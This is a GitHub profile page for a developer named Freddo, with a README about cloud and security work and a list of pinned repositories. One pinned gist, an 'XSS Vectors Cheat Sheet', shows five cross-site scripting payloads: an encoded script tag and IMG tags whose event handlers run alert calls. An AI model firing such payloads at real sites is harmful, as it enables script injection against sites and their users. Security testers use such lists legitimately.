Skip to content
View 4nemfreddo's full-sized avatar
πŸ˜„
πŸ˜„

Block or report 4nemfreddo

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
4nemfreddo/README.md

πŸ’« Hi, I’m Freddo!

πŸ‘‹ Welcome to my GitHub!
I’m a Software Developer passionate about building scalable web applications and cloud-based security solutions for businesses.

πŸš€ What I’m Working On

  • Collaborating on web applications and cloud-based information security projects.
  • Expanding my portfolio with Platform-as-a-Service (PaaS) and Software-as-a-Service (SaaS) solutions.

🌱 Current Focus

  • Enhancing my AWS expertise to create robust, cloud-native solutions.
  • Diving deeper into Terraform for infrastructure automation.

πŸ’¬ Ask Me About

  • Designing custom software and cloud architectures for your projects.
  • Best practices for security in the cloud and backup management

⚑ Fun Fact

T H E W O R L D I S Y O U R S. 🌍


Feel free to fork a project or connect with me here. Let’s build something amazing together!

🌐 Socials:

LinkedIn Medium

πŸ’» Tech Stack:

HTML5 Shell Script TypeScript Windows Terminal Lua AWS Google Cloud GithubPages JWT Next JS NodeJS React SASS Svelte TailwindCSS Vite WordPress MicrosoftSQLServer MongoDB MySQL Postgres SQLite SPLUNK JavaScript MariaDB

Pinned Loading

  1. freddo-portfolio freddo-portfolio Public

    TypeScript

  2. notes-app notes-app Public

    Notes App built to share your moments with friends

    Blade

  3. SalesFlow SalesFlow Public

    Blade

  4. subscription-tracker subscription-tracker Public

    JavaScript

  5. wordlists wordlists Public

    Forked from assetnote/wordlists

    Automated & Manual Wordlists provided by Assetnote

    CSS

  6. XSS Vectors Cheat Sheet XSS Vectors Cheat Sheet
    1
    %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
    2
    <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
    3
    <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
    4
    <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
    5
    <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">